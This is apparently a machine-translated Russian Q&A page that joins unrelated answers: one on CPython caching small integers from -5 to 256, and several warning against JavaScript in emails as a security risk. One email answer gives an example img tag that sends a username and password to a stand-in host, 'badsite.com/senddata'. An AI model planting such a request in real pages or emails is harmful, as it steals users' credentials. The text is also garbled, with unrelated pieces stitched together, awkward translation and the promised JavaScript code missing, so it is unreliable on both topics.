Взгляните на это:
>>> a = 256
>>> b = 256
>>> id(a)
9987148
>>> id(b)
9987148
>>> a = 257
>>> b = 257
>>> id(a)
11662816
>>> id(b)
11662828
EDIT: Вот что я нашел в документации Python 2, «Plain Integer Objects» (То же самое для Python 3 ):
Текущая реализация хранит массив целых объектов для всех целых чисел от -5 до 256, когда вы создаете int в этом диапазоне, на котором вы просто возвращаетесь ссылку на существующий объект. Поэтому должно быть возможно изменить значение 1. Я подозреваю, что поведение Python в этом случае не определено. : -)
blockquote>
Вы перечислили правильные аргументы против использования JavaScript в электронных письмах. Они показывают Вам, что это - плохая идея. Соединение со страницей, где можно использовать JavaScript свободно, является хорошим вариантом и позволяет пользователю решить, если и когда он хочет получить доступ к этому "расширенному" содержанию.
Так как спам был бы таким грандиозным предприятием, я придерживался бы посылания основных электронных писем, которые являются легко потребляемыми. Можно всегда связываться с веб-страницей, которая имеет JavaScript в нем. Можно также отправить querystring параметр в URL для отслеживания пользователей, которые больше всего интересуются электронными письмами, потому что это скажет Вам, что они - щелчок в них. Таким образом, в то время как это может быть возможно, его, вероятно, лучший для предотвращения его.
Проблема JavaScript состоит в том, что он излагает угрозу нарушения безопасности. Если существует какой-либо почтовый клиент, который принимает его, то это наиболее вероятно уязвимость системы обеспечения безопасности и должно быть зафиксировано.
Так, действительно, "даже не беспокоятся", потому что, даже если это работает, это скоро прекратит работать.
РЕДАКТИРОВАНИЕ: Некоторые люди, кажется, не понимают , почему это - угроза безопасности, таким образом, я объясню.
Рассматривают следующий код (один из нескольких способов украсть пароли с помощью JavaScript и небезопасных почтовых клиентов).
Используя JavaScript:
<img src="badsite.com/senddata?username=user&password=pass">
. Обычно, просто создав форму с помощью JavaScript в собственном небезопасном веб-сайте не вредно отдельно, потому что браузер достаточно умен для сообщения данных Gmail только Gmail (и Вы обычно не пытаетесь украсть пароли из своего собственного сайта, и в этом случае были бы более легкие способы украсть их так или иначе).
Однако при разрешении JavaScript в электронных письмах, затем браузер не был бы способен к разделению законного JavaScript из небезопасного кода.
воровство Cookie также возможно, если почтовый клиент не может отфильтровать JavaScript.
да, это возможно, но не рекомендуется. в целях безопасности чаще всего программное обеспечение для управления почтой блокирует js или предупреждает, если он включает js. если пользователь строг к спаму, то это письмо также попадает в спам.